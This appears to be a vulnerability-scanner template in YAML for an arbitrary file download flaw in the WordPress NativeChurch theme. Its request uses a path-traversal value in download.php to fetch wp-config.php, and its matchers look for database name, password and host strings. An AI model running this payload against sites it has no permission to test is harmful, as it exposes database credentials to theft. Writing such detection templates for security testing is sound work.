id: nativechurch-wp-theme-lfd

info:
  name: WordPress NativeChurch Theme Arbitrary File Download
  author: 0x_Akoko
  severity: high
  description: A LFD Bug In download.php File In NativeChurch Theme And Make Site Vulnerable.
  reference: https://packetstormsecurity.com/files/132297/WordPress-NativeChurch-Theme-1.0-1.5-Arbitrary-File-Download.html
  tags: wordpress,wp-theme,lfi

requests:
  - method: GET
    path:
      - '{{BaseURL}}/wp-content/themes/NativeChurch/download/download.php?file=../../../../wp-config.php'

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "DB_NAME"
          - "DB_PASSWORD"
          - "DB_HOST"
          - "The base configurations of the WordPress"
        part: body
        condition: and
